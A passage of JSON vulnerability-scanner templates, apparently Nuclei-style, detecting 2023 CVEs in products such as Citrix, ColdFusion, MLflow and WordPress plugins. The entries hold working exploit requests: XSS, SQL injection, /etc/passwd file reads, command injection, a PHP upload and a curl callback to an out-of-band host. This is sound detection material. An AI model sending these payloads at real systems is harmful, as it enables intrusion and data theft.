Scripting","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/Citrix/teststoreAuth/SamlTest"],"headers":{"Content-Type":"application/x-www-form-urlencoded"},"body":"SAMLResponse=q1YKdvT1CUotLsjPK05VskLhBrhHlSVVOpkkhZebJRs7ZUQahVp6ZkYVp7iUVEUaexUkewTmRhkHmkeGV%2bQk5wXm%2bwZn5yZ5BJr7GPtlJefmlKc4R%2bWluBRnBmSVl0XlWpYFpNvaKtUCAA%3d%3d","matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains_all(body, \"<script>alert(1)</script>\", \"XmlException\")"],"condition":"and"}]}]},{"id":"CVE-2023-6786","info":{"name":"Payment Gateway for Telcell < 2.0.4 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin.php?page=wc-settings&action=redirect_telcell_form&api_url=https://oast.me"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)oast\\.me.*$"]}]}]},{"id":"CVE-2023-4112","info":{"name":"PHPJabbers Shuttle Booking Software 1.0 - Cross Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php/gm5rj%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3Ebwude?controller=pjAdmin&action=pjActionLogin&err=1"],"matchers":[{"type":"dsl","dsl":["contains(body, \"PHPJabbers\") && contains(body, \"><script>alert(document.domain)</script>\")","contains(content_type, \"text/html\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-43662","info":{"name":"ShokoServer System - Local File Inclusion (LFI)","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/Image/withpath/C:\\Windows\\win.ini"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"},{"type":"word","part":"content_type","words":["text/plain"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-36284","info":{"name":"QloApps 1.6.0 - SQL Injection","severity":"high"},"requests":[{"raw":["GET / HTTP/2\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"body","internal":true,"words":["QloApps"],"case-insensitive":true}]},{"raw":["@timeout: 20s\nGET /quick-order?date_from=2023-06-12%2000:00:00&date_to=2023-06-13%2000:00:00&deleteFromOrderLine=1&id_product=(select(0)from(select(sleep(5)))v) HTTP/2\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=5","contains(body, \"<span>Guest Information\")"],"condition":"and"}]}]},{"id":"CVE-2023-37266","info":{"name":"CasaOS  < 0.4.4 - Authentication Bypass via Random JWT Token","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/v1/folder?path=%2F"],"headers":{"Authorization":"{{jwt_token}}"},"matchers":[{"type":"word","words":["\"success\":200","\"message\":\"ok\"","content","is_dir"],"condition":"and"}],"extractors":[{"type":"json","json":[".data.content[].path"]}]}]},{"id":"CVE-2023-26842","info":{"name":"ChurchCRM 4.5.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /session/begin HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nUser={{username}}&Password={{password}}\n","POST /OptionManager.php?mode=classes&ListID=1 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n1name=Member&2name=Regular+Attender&3name=Guest&4name=Non-Attender&5name=Non-Attender+%28staff%29&newFieldName=\" onfocus=alert(document.domain) autofocus=\"&AddField=Add+New+Person+Classification\n"],"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"onfocus=alert(document.domain) autofocus=\")","contains(body_2, \"ChurchCRM\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2023-29923","info":{"name":"PowerJob <=4.3.2 - Unauthenticated Access","severity":"medium"},"requests":[{"raw":["POST /job/list HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json;charset=UTF-8\n\n{\"appId\":1,\"index\":0,\"pageSize\":10}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{\"success\":true,\"data\":{\"index\":0,\"pageSize\":10,"]},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-27008","info":{"name":"ATutor < 2.2.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST /atutor/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ntoken=asdf\");}alert(document.domain);+function+asdf()+{//\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":[");}alert(document.domain); function","ATutor","Login"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-1177","info":{"name":"Mlflow <2.2.1 - Local File Inclusion","severity":"critical"},"requests":[{"raw":["POST /ajax-api/2.0/mlflow/registered-models/create HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json; charset=utf-8\n\n{\"name\":\"{{randstr}}\"}\n","POST /ajax-api/2.0/mlflow/model-versions/create HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json; charset=utf-8\n\n{\"name\":\"{{randstr}}\",\"source\":\"file:///etc/\"}\n","GET /model-versions/get-artifact?path=passwd&name=AJAX-API&version={{version}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"version","group":1,"regex":["\"version\": \"([0-9.]+)\","],"internal":true,"part":"body"}]}]},{"id":"CVE-2023-2796","info":{"name":"EventON <= 2.1 - Missing Authorization","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=eventon_ics_download&event_id=1"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["BEGIN:VCALENDAR","END:VCALENDAR"],"condition":"and"},{"type":"word","part":"header","words":["text/Calendar"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-44353","info":{"name":"Adobe ColdFusion WDDX Deserialization Gadgets","severity":"critical"},"requests":[{"raw":["POST /CFIDE/wizards/common/utils.cfc?method=wizardHash%20inPassword=bar%20_cfclient=true HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nargumentCollection=<wddxPacket+version='1.0'><header/><data><struct+type='acoldfusion.tagext.io.cache.CacheTaga'><var+name='directory'><string>{{windows_known_path}}</string></var></struct></data></wddxPacket>\n","POST /CFIDE/wizards/common/utils.cfc?method=wizardHash%20inPassword=bar%20_cfclient=true HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nargumentCollection=<wddxPacket+version='1.0'><header/><data><struct+type='acoldfusion.tagext.io.cache.CacheTaga'><var+name='directory'><string>{{windows_bad_path}}</string></var></struct></data></wddxPacket>\n","POST /CFIDE/wizards/common/utils.cfc?method=wizardHash%20inPassword=bar%20_cfclient=true HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nargumentCollection=<wddxPacket+version='1.0'><header/><data><struct+type='acoldfusion.tagext.io.cache.CacheTaga'><var+name='directory'><string>{{linux_known_path}}</string></var></struct></data></wddxPacket>\n","POST /CFIDE/wizards/common/utils.cfc?method=wizardHash%20inPassword=bar%20_cfclient=true HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nargumentCollection=<wddxPacket+version='1.0'><header/><data><struct+type='acoldfusion.tagext.io.cache.CacheTaga'><var+name='directory'><string>{{linux_bad_path}}</string></var></struct></data></wddxPacket>\n"],"matchers-condition":"or","matchers":[{"type":"dsl","name":"windows","dsl":["status_code_1 == 500 && status_code_2 == 404","contains(body_1, \"coldfusion.runtime\")"],"condition":"and"},{"type":"dsl","name":"linux","dsl":["status_code_3 == 500 && status_code_4 == 404","contains(body_3, \"coldfusion.runtime\")"],"condition":"and"}]}]},{"id":"CVE-2023-41109","info":{"name":"SmartNode SN200 Analog Telephone Adapter (ATA) & VoIP Gateway - Command Injection","severity":"critical"},"requests":[{"raw":["POST /rest/xxxxxxxxxxxxxxx/xxxxxxx?executeAsync HTTP/1.1\nHost: {{Hostname}}\nCookie: AuthToken=; AuthGroup=superuser; UserName=admin\n\n{\"cmd\":\"{{payload}}\",\"arguments\":[]}\n"],"matchers":[{"type":"word","part":"body","words":["dd556350275e2ee0a2e877cea9c8a74a"]}]}]},{"id":"CVE-2023-31059","info":{"name":"Repetier Server - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/views..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cProgramData%5cRepetier-Server%5cdatabase%5cuser.sql%20/base/connectionLost.php"],"matchers-condition":"and","matchers":[{"type":"binary","part":"body","binary":["53514C69746520666F726D6174203300"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-29298","info":{"name":"Adobe ColdFusion - Access Control Bypass","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}//CFIDE/wizards/common/utils.cfc?method=wizardHash&inPassword=foo&_cfclient=true&returnFormat=wddx"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["([0-9a-fA-F]{32},){2}[0-9a-fA-F]{32}"]},{"type":"dsl","dsl":["contains(content_type, \"text/html\")","status_code == 200","len(trim_space(body)) == 106"],"condition":"and"}]}]},{"id":"CVE-2023-2948","info":{"name":"OpenEMR < 7.0.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/library/custom_template/share_template.php?list_id=1}});}}alert(document.domain);function%20x(){if(1){a=({a:{a:1"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(header, \"text/html\")","contains_all(body, \"list_id: 1}});}}alert(document.domain);\", \"select at least one Provider\", \"Save</span>\")"],"condition":"and"}]}]},{"id":"CVE-2023-5375","info":{"name":"Mosparo < 1.0.2 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/project/switch/1?targetPath=http://oast.pro"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)oast\\.pro.*$"]}]}]},{"id":"CVE-2023-3936","info":{"name":"Blog2Social < 7.2.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=blog2social&origin=publish_post&deletePostStatus=success&deletedPostsNumber=1<img+src+onerror%3Dalert%28document.domain%29> HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Deleted 1<img src onerror=alert(document.domain)> posts"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-50917","info":{"name":"MajorDoMo thumb.php - OS Command Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)","rtsp_transport"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-37270","info":{"name":"Piwigo 13.7.0 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /identification.php HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: '\">{{7*7}}${2*2}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}&login=\n","GET /admin.php?page=user_activity HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["Warning: [mysql error","INSERT  INTO","SQL syntax;"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-1454","info":{"name":"Jeecg-boot 3.5.0 qurestSql - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /jeecg-boot/jmreport/qurestSql HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json;charset=UTF-8\n\n{\"apiSelectId\":\"1316997232402231298\",\"id\":\"1' or '%1%' like (updatexml(0x3a,concat(1,(select current_user)),1)) or '%%' like '\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["SQLException","XPATH syntax error:"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","group":1,"regex":["XPATH syntax error: '([a-z_@%]+)'","XPATH syntax error: '([a-z- @%]+)'","XPATH syntax error: '([a-z@%0-9.]+)'"],"part":"body"}]}]},{"id":"CVE-2023-25717","info":{"name":"Ruckus Wireless Admin - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/forms/doLogin?login_username=admin&password=password$(curl%20{{interactsh-url}})&x=0&y=0"],"matchers":[{"type":"dsl","dsl":["contains(interactsh_protocol, 'http')","contains_all(to_lower(interactsh_request), 'user-agent','curl')","status_code_1 == 302"],"condition":"and"}]}]},{"id":"CVE-2023-1434","info":{"name":"Odoo - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/web/set_profiling?profile=0&collectors=<script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","\"params\":","session"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-35078","info":{"name":"Ivanti Endpoint Manager Mobile (EPMM) - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/mifs/aad/api/v2/admins/users"],"max-size":100,"matchers":[{"type":"dsl","dsl":["contains_all(body, 'results','userId','name')","contains(header, 'application/json')","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-2224","info":{"name":"Seo By 10Web < 1.2.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=wdseo_sitemap HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/admin.php?page=wdseo_sitemap&id_message=2 HTTP/1.1\nHost: {{Hostname}}\n\ntask=save&wd_settings%5Bsitemap%5D=1&wd_settings%5Bbing_verification%5D=&wd_settings%5Byandex_verification%5D=&wd_settings%5Bnotify_google%5D=0&wd_settings%5Bnotify_bing%5D=0&wd_settings%5Badditional_pages%5D%5B%5D=&wd_settings%5Badditional_pages%5D%5Bpage_url%5D%5B%5D=%22%3E%3Caudio+src%3Dx+onerror%3Dconfirm%28document.domain%29%3E&wd_settings%5Badditional_pages%5D%5Bpriority%5D%5B%5D=0&wd_settings%5Badditional_pages%5D%5Bfrequency%5D%5B%5D=always&wd_settings%5Badditional_pages%5D%5Blast_changed%5D%5B%5D=&wd_settings%5Bexclude_post_types%5D%5B%5D=&wd_settings%5Bexclude_taxonomies%5D%5B%5D=&wd_settings%5Bexclude_archives%5D%5B%5D=&wd_settings%5Bexclude_posts%5D=&wd_settings%5Bsitemap_image%5D=0&wd_settings%5Bsitemap_video%5D=0&wd_settings%5Bsitemap_stylesheet%5D=1&wd_settings%5Blimit%5D=1000&wd_settings%5Bautoupdate_sitemap%5D=0&nonce_wdseo={{nonce}}&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Dwdseo_sitemap%26id_message%3D1\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_3","words":["value=\"\"><audio src=x onerror=confirm(document.domain)>\""]},{"type":"word","part":"header_3","words":["text/html"]},{"type":"status","part":"header_3","status":[200]}],"extractors":[{"type":"regex","name":"nonce","part":"body","group":1,"regex":["name=\"nonce_wdseo\" value=\"([a-z0-9]+)\" \\/>"],"internal":true}]}]},{"id":"CVE-2023-43187","info":{"name":"NodeBB XML-RPC Request xmlrpc.php - XML Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"matchers":[{"type":"dsl","internal":true,"dsl":["contains(to_lower(body), \"nodebb\")"]}]},{"method":"POST","path":["{{BaseURL}}/xmlrpc.php"],"headers":{"Content-Type":"text/xml"},"body":"<?xml version=\"1.0\"?>\n<methodCall>\n  <methodName>system.listMethods</methodName>\n  <params>\n    <param>\n      <value><?php phpinfo(); ?></value>\n    </param>\n  </params>\n</methodCall>\n","matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<title>phpinfo()</title>","PHP Version"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-27032","info":{"name":"PrestaShop AdvancedPopupCreator - SQL Injection","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","@timeout 20s\nPOST /module/advancedpopupcreator/popup HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\navailablePopups=if(now()=sysdate()%2Csleep(6)%2C0)&event=1&fromController=product&getPopup=1&id_category=0&id_manufacturer=0&id_product=1&id_supplier=0&referrer=&responsiveWidth=1280&time={{time}}&token={{token}}\n"],"matchers":[{"type":"dsl","dsl":["duration_2>=6","status_code == 200","contains(content_type, \"text/html\")","contains_all(body, 'popups','hasError')"],"condition":"and"}],"extractors":[{"type":"regex","name":"time","group":1,"regex":[",\"time\":([0-9]+),"],"internal":true},{"type":"regex","name":"token","group":1,"regex":[",\"static_token\":\"([0-9a-z]+)\","],"internal":true}]}]},{"id":"CVE-2023-34753","info":{"name":"bloofoxCMS v0.5.2.1 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /admin/index.php HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}&action=login\n","@timeout: 10s\nPOST /admin/index.php?mode=settings&page=tmpl&action=edit HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nname=default&template=default.html&css=default.css&template_print=print.html&template_print_css=print.css&template_login=login.html&template_text=text.html&be=0&tid='+AND+(SELECT+7401+FROM+(SELECT(SLEEP(6)))hwrS)--+&send=Save\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["duration>=6","contains(header_2, \"text/html\")","contains(body_2, 'bloofoxCMS Admincenter')"],"condition":"and"}]}]},{"id":"CVE-2023-27292","info":{"name":"OpenCATS - Open Redirect","severity":"medium"},"requests":[{"raw":["POST /index.php?m=login&a=attemptLogin HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n","GET /index.php?m=settings&a=previewPage&url=https://oast.me HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"matchers-condition":"and","matchers":[{"type":"word","words":["<TITLE>Page Preview</TITLE>","<FRAME src=\"https://oast.me\">"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-44352","info":{"name":"Adobe Coldfusion - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/{{string}}\"><img src=a onerror=alert(document.domain)>/..CFIDE/wizards/common/_authenticatewizarduser.cfm","{{BaseURL}}//{{string}}\"><img src=a onerror=alert(document.domain)>/..CFIDE/wizards/common/_authenticatewizarduser.cfm","{{BaseURL}}/{{string}}\"><img src=a onerror=alert(document.domain)>/..CFIDE/administrator/index.cfm","{{BaseURL}}//{{string}}\"><img src=a onerror=alert(document.domain)>/..CFIDE/administrator/index.cfm","{{BaseURL}}/{{string}}%22>%3Cscript%3Ealert(document.domain)%3C/script%3E/..CFIDE/administrator/index.cfm","{{BaseURL}}//{{string}}%22>%3Cscript%3Ealert(document.domain)%3C/script%3E/..CFIDE/administrator/index.cfm","{{BaseURL}}/{{string}}%22>%3Cscript%3Ealert(document.domain)%3C/script%3E/..CFIDE/wizards/common/_authenticatewizarduser.cfm","{{BaseURL}}//{{string}}%22>%3Cscript%3Ealert(document.domain)%3C/script%3E/..CFIDE/wizards/common/_authenticatewizarduser.cfm"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["action=\"/{{string}}\"><img src=a onerror=alert(document.domain)>","\"{{string}}\"><script>alert(document.domain)</script>"],"condition":"or"},{"type":"dsl","dsl":["contains(body, 'ColdFusion')","contains(header, 'text/html')"],"condition":"and"}]}]},{"id":"CVE-2023-0562","info":{"name":"Bank Locker Management System v1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /banker/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername=admin%27+AND+4719%3D4719--+GZHh&inputpwd=ABC&login=\n"],"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body, \"admin\")","contains(body, \"BLMS | Dashboard\")"],"condition":"and"}]}]},{"id":"CVE-2023-49103","info":{"name":"OwnCloud - Phpinfo Configuration","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php/{{rand_base(4)}}.css","{{BaseURL}}/owncloud/apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php/{{rand_base(4)}}.css"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["PHP Extension","PHP Version","owncloud"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-27639","info":{"name":"PrestaShop TshirteCommerce - Directory Traversal","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/tshirtecommerce/ajax.php?type=svg"],"headers":{"Content-Type":"application/x-www-form-urlencoded"},"body":"url=.%2F..%2Fvendor%2Fjdorn%2Fsql-formatter%2Fexamples&file_name=examples.php","matchers-condition":"and","matchers":[{"type":"word","words":["SqlFormatter Examples","SqlFormatter","<?php"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-3479","info":{"name":"Hestiacp <= 1.7.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/templates/pages/debug_panel.php?id={{randstr}}\"><script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["debug-panel","<script>alert(document.domain)</script>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-29439","info":{"name":"FooGallery plugin <= 2.2.35 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/post-new.php?post_type=foogallery&post=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["data-gallery_id=\"\\\"><script>alert(document.domain)</script>\"","foogallery-image-edit-modal"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-2648","info":{"name":"Weaver E-Office 9.5 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /inc/jquery/uploadify/uploadify.php  HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundarydRVCGWq4Cx3Sq6tt\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\n\n------WebKitFormBoundarydRVCGWq4Cx3Sq6tt\nContent-Disposition: form-data; name=\"Filedata\"; filename=\"{{file}}.php.\"\nContent-Type: image/jpeg\n\n<?php echo md5(\"{{string}}\");unlink(__FILE__);?>\n------WebKitFormBoundarydRVCGWq4Cx3Sq6tt\n","POST /attachment/{{name}}/{{file}}.php  HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["{{md5(string)}}"]},{"type":"status","part":"body_2","status":[200]}],"extractors":[{"type":"regex","name":"name","part":"body","group":1,"regex":["([0-9]+)"],"internal":true}]}]},{"id":"CVE-2023-1890","info":{"name":"Tablesome < 1.0.9 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/edit.php?post_type=tablesome_cpt&a%22%3e%3cscript%3ealert`document.domain`%3c%2fscript%3e HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"<script>alert`document_domain`</script>\")","contains(body_2, \"tablesome\")"],"condition":"and"}]}]},{"id":"CVE-2023-39700","info":{"name":"IceWarp Mail Server v10.4.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /webmail/?color=%22%3E%3Cimg%20src=x%20onerror=confirm(document.cookie)%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(header, \"text/html\")","contains(body, \"><img src=x onerror=confirm(document.cookie)>\") && contains(body, \"IceWarp\")"],"condition":"and"}]}]},{"id":"CVE-2023-35158","info":{"name":"XWiki - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/xwiki/bin/view/XWiki/Main?xpage=restore&showBatch=true&xredirect=javascript:alert(document.domain)"],"matchers":[{"type":"dsl","dsl":["contains(body, \"href=\\\"javascript:alert(document.domain)\\\">Cancel</a>\")","contains(header, \"text/html\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-3077","info":{"name":"MStore API < 3.9.8 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/mstore-api/readme.txt"],"matchers":[{"type":"dsl","internal":true,"dsl":["status_code == 200","contains(body, \"MStore API\")"],"condition":"and"}]},{"raw":["@timeout: 15s\nGET /wp-json/api/flutter_booking/get_staffs?product_id=%27+or+ID=sleep(6)--+- HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-23752","info":{"name":"Joomla! Webservice - Password Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/index.php/v1/config/application?public=true","{{BaseURL}}/api/v1/config/application?public=true"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"links\":","\"attributes\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json","application/vnd.api+json"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-3847","info":{"name":"MooDating 1.2 - Cross-Site scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/users/viewi1omd%22%3e%3cimg%20src%3da%20onerror%3dalert(document.domain)%3el43yn/108?tab=activity"],"matchers":[{"type":"dsl","dsl":["status_code == 404","contains(content_type, \"text/html\")","contains_all(body, \"><img src=a onerror=alert(document.domain)>\",\"mooDating\")"],"condition":"and"}]}]},{"id":"CVE-2023-4634","info":{"name":"Media Library Assistant < 3.09 - Remote Code Execution/Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/media-library-assistant/readme.txt","{{BaseURL}}/wp-content/plugins/media-library-assistant/includes/mla-stream-image.php?mla_stream_file=ftp://{{interactsh-url}}/patrowl.svg"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_1","words":["Media Library Assistant"]},{"type":"word","part":"interactsh_protocol","words":["dns"]}]}]},{"id":"CVE-2023-52085","info":{"name":"Winter CMS Local File Inclusion - (LFI)","severity":"medium"},"requests":[{"raw":["GET /backend/backend/auth/signin HTTP/1.1\nHost: {{Hostname}}\n","POST /backend/backend/auth/signin HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_token={{_token}}&postback=1&login={{username}}&password={{password}}\n","POST /backend/system/mailbrandsettings HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-WINTER-REQUEST-HANDLER: onSave\nX-WINTER-REQUEST-PARTIALS:\nX-Requested-With: XMLHttpRequest\n\n_token={{_token}}&MailBrandSetting%5Bbody_bg%5D=%2342445B;@import%20(inline)%20%22/etc/passwd%22&redirect=0\n","GET /backend/system/mailbrandsettings HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"max-redirects":3,"matchers":[{"type":"regex","part":"body_4","regex":["root:[x*]:0:0:"]}],"extractors":[{"type":"regex","part":"body","name":"_token","group":1,"regex":["<input name=\"_token\" type=\"hidden\" value=\"([0-9a-zA-Z]{40})\">"],"internal":true}]}]},{"id":"CVE-2023-27482","info":{"name":"Home Assistant Supervisor - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /api/hassio/app/.%252e/supervisor/info HTTP/1.1\nHost: {{Hostname}}\n","GET /api/hassio/app/.%09./supervisor/info HTTP/1.1 # Mitigation bypass 1\nHost: {{Hostname}}\n","GET 